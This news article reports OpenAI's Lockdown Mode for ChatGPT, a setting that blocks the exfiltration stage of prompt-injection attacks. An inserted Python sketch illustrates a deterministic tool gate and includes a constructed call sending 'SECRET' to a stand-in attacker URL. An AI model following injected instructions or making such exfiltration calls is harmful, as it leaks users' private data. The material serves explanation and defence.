[ARTICLE · art-23049] src=letsdatascience.com pub= topic=ai-safety verified=true sentiment=· neutral

OpenAI launches ChatGPT Lockdown Mode for security

OpenAI on February 13, 2026 launched Lockdown Mode, an optional advanced security setting for ChatGPT that deterministically disables tools attackers could use to exfiltrate data through prompt injection. The feature, initially available for ChatGPT Enterprise, Edu, Healthcare, and Teachers plans before expanding to all logged-in users, limits web browsing to cached content and disables capabilities such as Deep Research and Agent Mode. OpenAI said Lockdown Mode reduces but does not eliminate prompt-injection risk, as it blocks the exfiltration stage rather than stopping injected content from reaching the model.

4 min read · published Jun 6, 2026

OpenAI on February 13, 2026 introduced Lockdown Mode, an optional advanced security setting for ChatGPT, alongside standardized Elevated Risk labels for higher-risk capabilities across ChatGPT, ChatGPT Atlas, and Codex. According to OpenAI, Lockdown Mode is aimed at a small set of highly security-conscious users, such as executives or security teams at prominent organizations, and deterministically disables tools an attacker could use to exfiltrate data through prompt injection. OpenAI says web browsing is limited to cached content so no live network requests leave its controlled network, and capabilities such as Deep Research and Agent Mode are turned off. The feature launched for ChatGPT Enterprise, Edu, Healthcare, and Teachers plans; per OpenAI's release notes it has since expanded to all logged-in users across account types. OpenAI stresses Lockdown Mode reduces, but does not eliminate, prompt-injection risk and does not stop injected content from reaching the model.

What happened

OpenAI on February 13, 2026 introduced two prompt-injection protections for ChatGPT: Lockdown Mode, an optional advanced security setting, and standardized Elevated Risk labels for higher-risk capabilities across ChatGPT, ChatGPT Atlas, and Codex. In its announcement, OpenAI described Lockdown Mode as built for a small set of highly security-conscious users, such as executives or security teams at prominent organizations, and said it is not necessary for most users. OpenAI framed the launch as building on existing protections such as sandboxing, defenses against URL-based data exfiltration, and enterprise controls like role-based access and audit logs.

How Lockdown Mode works

According to OpenAI, Lockdown Mode deterministically disables tools and capabilities that an adversary could use to exfiltrate sensitive data from conversations or connected apps through prompt-injection attacks. OpenAI says web browsing is limited to cached content, so no live network requests leave its controlled network, and some features are disabled entirely where it cannot provide strong deterministic guarantees of data safety. OpenAI's documentation indicates Deep Research is fully disabled and Agent Mode is unavailable while the setting is on. Workspace admins enable Lockdown Mode through a role in Workspace Settings and keep granular control over which connected apps and actions remain available. OpenAI stresses an important limit: the mode does not stop injected content from reaching the model, and it reduces but does not eliminate prompt-injection risk; it instead blocks the exfiltration stage where data would be sent to an attacker.
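An added sketch of the pattern described above, not OpenAI's implementation and not code from the article: a fixed-rule gate sits between the model and its tools, so a tool call produced by injected text is refused no matter what the model was persuaded to do. The tool identifiers, cache, connector names and URLs are constructed assumptions.

```python
from dataclasses import dataclass, field

# Hypothetical tool identifiers for the capabilities the article names.
DISABLED_IN_LOCKDOWN = {"deep_research", "agent_mode"}

# Constructed stand-in for pages cached before the session started.
CACHE = {"https://example.com/docs": "cached copy of the docs page"}

@dataclass
class Session:
    lockdown: bool
    # Connected apps/actions the workspace admin left enabled (assumed shape).
    allowed_connectors: set = field(default_factory=set)

def dispatch(session, tool, arg):
    """Decide a model-requested tool call by fixed rules, never by asking the model."""
    if not session.lockdown:
        return "allow", f"live call {tool}({arg})"  # placeholder for real execution
    if tool in DISABLED_IN_LOCKDOWN:
        return "deny:disabled", None
    if tool == "browse":
        # Cached-only: a URL that is not cached is never requested, so data
        # packed into its path or query string has no way out.
        if arg in CACHE:
            return "allow", CACHE[arg]
        return "deny:not_cached", None
    if tool.startswith("connector:") and tool not in session.allowed_connectors:
        return "deny:connector", None
    return "allow", f"live call {tool}({arg})"

# Constructed tool calls a model might emit after reading injected text.
# The injected text still reached the model; only the outbound step is gated.
INJECTED_CALLS = [
    ("browse", "https://example.com/docs"),
    ("browse", "https://attacker.example/c?d=SECRET"),
    ("agent_mode", "send the file"),
    ("connector:mail", "forward thread"),
    ("connector:calendar", "list events"),
]

def replay(lockdown):
    """Return the gate's decision for each constructed call."""
    s = Session(lockdown=lockdown, allowed_connectors={"connector:calendar"})
    return [dispatch(s, tool, arg)[0] for tool, arg in INJECTED_CALLS]

if __name__ == "__main__":
    print("lockdown on :", replay(True))
    print("lockdown off:", replay(False))
```

The same five calls are all allowed with the setting off, which is the contrast the article draws between a deterministic gate and model-side defenses.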

Availability and rollout

OpenAI initially made Lockdown Mode available for ChatGPT Enterprise, ChatGPT Edu, ChatGPT for Healthcare, and ChatGPT for Teachers, and said it planned to extend the feature to consumers in the coming months. Per OpenAI's release notes, Lockdown Mode has since expanded to all logged-in users across account types and workspaces, widening availability well beyond the original business and education plans.

Why it matters

Editorial analysis: Prompt injection remains one of the most consequential unresolved security problems for agentic and tool-connected LLM deployments, where untrusted external content can hijack model behavior or siphon private context. A deterministic, capability-gating control from the most widely deployed assistant vendor gives security teams a concrete policy primitive to isolate sensitive workflows rather than relying solely on probabilistic, model-side defenses. As a generic industry pattern, narrowing permitted input and output channels in high-risk sessions is a common mitigation, and consistent risk labeling across surfaces helps users make informed choices about browsing, connectors, and agent access.

What to watch

Editorial analysis: Open questions for practitioners include the audit and logging visibility available while Lockdown Mode is active, the exact rule set that triggers the Elevated Risk label and whether admins can configure it, and how the mode behaves with third-party connectors and custom tool chains. Independent security researchers' evaluations of the mode against real prompt-injection variants will be the clearest signal of how much protection it delivers in practice.

Scoring Rationale

A widely covered security feature from the leading AI vendor that ships a deterministic, capability-gating defense against prompt-injection data exfiltration, a top operational concern for agentic and tool-connected LLM use. It is an optional hardening setting that does not change model capabilities and is unnecessary for most users, which caps its importance, but the move to all logged-in users and the cross-surface Elevated Risk labels make it notably relevant to security-minded practitioners.
